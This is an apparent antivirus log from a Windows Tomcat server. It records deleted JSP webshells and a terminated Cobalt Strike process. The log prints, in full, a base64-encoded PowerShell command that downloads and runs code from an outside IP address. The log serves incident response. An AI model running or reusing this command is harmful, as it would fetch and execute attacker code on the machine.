病毒名称:Backdoor/JSP.WebShell.bh
病毒ID:F72F2DCBAC3D5C2C
病毒路径:E:\TRWfe\tomcat\webapps\trwfe\tippay.jsp
操作类型:修改
操作结果:已处理,删除文件
进程ID:4484
操作进程:E:\TRWfe\tomcat\bin\tomcat8.exe
操作进程命令行:e:\TRWfe\tomcat\bin\Tomcat8.exe //RS//TRWfeTomcat
父进程ID:652
父进程:C:\Windows\System32\services.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【2】2025-11-07 10:58:32,病毒防护,文件实时监控,发现病毒Backdoor/JSP.WebShell.bh, 已处理
病毒名称:Backdoor/JSP.WebShell.bh
病毒ID:F72F2DCBAC3D5C2C
病毒路径:E:\TRWfe\tomcat\webapps\trwfe\tippay4.jsp
操作类型:修改
操作结果:已处理,删除文件
进程ID:4484
操作进程:E:\TRWfe\tomcat\bin\tomcat8.exe
操作进程命令行:e:\TRWfe\tomcat\bin\Tomcat8.exe //RS//TRWfeTomcat
父进程ID:652
父进程:C:\Windows\System32\services.exe
病毒名称:Backdoor/CobaltStrike.l
病毒ID:7E662B652271E28F
虚拟地址:0x00000000C0450000
映像大小:4.0KB
是否完整映像:否
数据流哈希:cafbd78c
操作结果:处理成功,进程已结束
进程ID:1228
操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作进程命令行:powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AOQA0AC4ANQAyADoAMgAxADYANAAvAHgAZwBGAGEAQwAnACkA
父进程ID:2904
父进程:C:\Windows\System32\cmd.exe
父进程命令行:cmd /c "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AOQA0AC4ANQAyADoAMgAxADYANAAvAHgAZwBGAGEAQwAnACkA"